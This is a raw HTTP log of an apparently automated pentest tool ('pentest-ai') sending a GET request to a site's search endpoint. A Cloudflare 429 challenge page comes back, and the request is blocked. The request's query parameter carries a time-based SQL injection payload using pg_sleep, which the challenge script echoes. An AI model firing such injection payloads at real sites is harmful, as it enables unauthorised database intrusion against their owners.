REQUEST:
GET https://my.myfirst.tech/search?options[prefix]=1%27%20%7C%7C%20pg_sleep%285%29%7C%7C%27
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9441
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8472daae8a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=lZ3hv4MY14Yszmb%2FDxgU7EyZQy2jML78%2ByzcFuL%2FsomGtTkUHxR1evrFbiXzz2d4%2F8v7xU21miDtQ6odA5SZg4hGHazvmELJsCX5n9KgRHxqO69ifkEJwLBl4kMvd9VQY%2FoKZe9Q4YTAj3Qq6A%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8472daae8a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: '8Echg5gWm_jRYGtRqOf6jmY_BWG2gTvzNkJTnkM9w3Q-1784281151-1.2.1.1-AASJFEFEDyMXfJwQT_MzLIBsVphPsaNwzSX3I6vDj4kezkEarVm52eGxx28PiUlb',cITimeS: '1784281151',cRay: 'a1c8472daae8a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?options%5Bprefix%5D=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_tk=Y.tueQmbT.KTn_nnDZss5VmVsOxySDBAVFCxy2NLsis-1784281151-1.0.1.1-0fw3EdM8XooI._pJyZGCljSYluHOQG4bO8sJk.MmRLE",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?options%5Bprefix%5D=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_f_tk=Y.tueQmbT.KTn_nnDZss5VmVsOxySDBAVFCxy2NLsis-1784281151-1.0.1.1-0fw3EdM8XooI._pJyZGCljSYluHOQG4bO8sJk.MmRLE",md: 'QegsOvXNXT9nyGsPRtpe28u8JlViji7cPrsN1JeMrOQ-1784281151-1.2.1.1-pqAGs6OjCSq4yG.Xkp.J_aWHOWYTHfN4Y3_Zb3ZKB9RFq9dD.deI2Wnp64nf36ccgsHijNHojkuXq6K_uRK9K4QmC5wEqs7pmZoSo_jlmAFVp_5__Ay7iQYbmwPW1.42gWEjawfPt6Cx_BRVd2YnAWRCdyI_LU5_zZb01o1k91LiVsVPs8DH6FPaOz3iLV5NqPbDkNqdw2sG9dY65ddnmccaXSbp2qqAbCNLCcCpxM85OEZJKocJqJkw3iAD.2YckGZ12rw83sgdA_.aWzYwci6GxIzc2nYMXv9S66qPt2CecMs8N1YQeyeboEPpiLkAbsqApjZdo2aZvj0WbO9KAfgfAoPvZCCqt_yMl4WpA5.9nhSfV0pkQ9SghqA12XmNlhLbl.1ZQq14rp4QM4fNdMXayjZENGv7DZL6VZbkJFPmGqSB7P3mhEP6NN8Xm.uJkVhL4X0tifU8wq41pzqwVoyyy17Nx4QKSMaG_n34vRX66184ttjc0Ago78WYVLnBd6PYfDvLddDBvcRDUWqSOgWvifeNVIsUfG8O0PJjdsiDylLBtsX3sF.Ymu9kDmOxfmKzb89Kf58tPjSPMOJ_kXJj46lUGWhyPUQ1BCBKq4mzMFSH9QFak.uZh7AKDzQYLeTxWXoiWA8S.6QI7YgQhBs8qzZv9fCkYMngals110eo9z4L7MI8bTGoMyYvPUbTr02bUNEpfo93bIpDXPNHhcVaHdGReqSNfekzi0mtly3GPuWOB15GYvb3Z0Sp00tnYjCybo3RijtYA8VULHiyn_EM0XrqYnl2zVFXo.UpK59i9B8qFwOOBMV1zDjIFUkLyGflhR9MAl6bw6X1rAyrCC5LWDTzP5.V_.M8HVkdoEattz9e2LfGcpPov15CNjog0qnXK3Hw4bnI0ztwi.IOIcGNFrBlvGl9EKJNnYVt5w.2UCBxZ6oySPlyRheLkX4nMoCGrpquJhr0mICIWPtgnyiVoUn5RN8w6KSImSXVod0_tZONLxLfRif_tk.eOKLhncGOCuxd7lRgXWANLJSbnZIL7LyTQ.Klm.Qt9XDnHmGshljfK_B9UuboVtuEHP_6dfqDjAecFtYpHC8zx.zlfHR50zYP_2Vm8mQ_XevBEHi5uEdaQs64gemytXmQpKku7mDI8J_GGx07jBnWGBZ6mo8U4kwBP9KaQPyi.TDSBDr.T708Pifwvl23Q.26N.eK4dounjypq1Ac7XM7_qOWcQ',mdrd: 'I7g8SpUrY.CupQV7_FLzuYnpLOht8ebzcn2rFCsVAdo-1784281151-1.2.1.1-5QCXuwMrF.Gft3cio7iG2lVIwVEUZs5eXl1B3m7tHT8PAY6FDoqTRTmrMD7e2Uwt6NIhl_64vQDBoc38jbNSpfF8zCF0N_lULlOS0yp3TYNM9EyB6QIHwHhdWrNQYOlJZqdZ.3ETDV9HcTQdx5iogxsocpRallhZVxhSQ3ifXSnd4ks5VpqHnanIgrFaMneDnyjWtr0NrbD3wEg6qTOnLvzMv_gflyeM1PRyZbF2p3D0Vr2Hj_8ngjbU95vbwjcl',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8472daae8a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?options%5Bprefix%5D=1%27+%7C%7C+pg_sleep%285%29%7C%7C%27\u0026__cf_chl_rt_tk=Y.tueQmbT.KTn_nnDZss5VmVsOxySDBAVFCxy2NLsis-1784281151-1.0.1.1-0fw3EdM8XooI._pJyZGCljSYluHOQG4bO8sJk.MmRLE"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
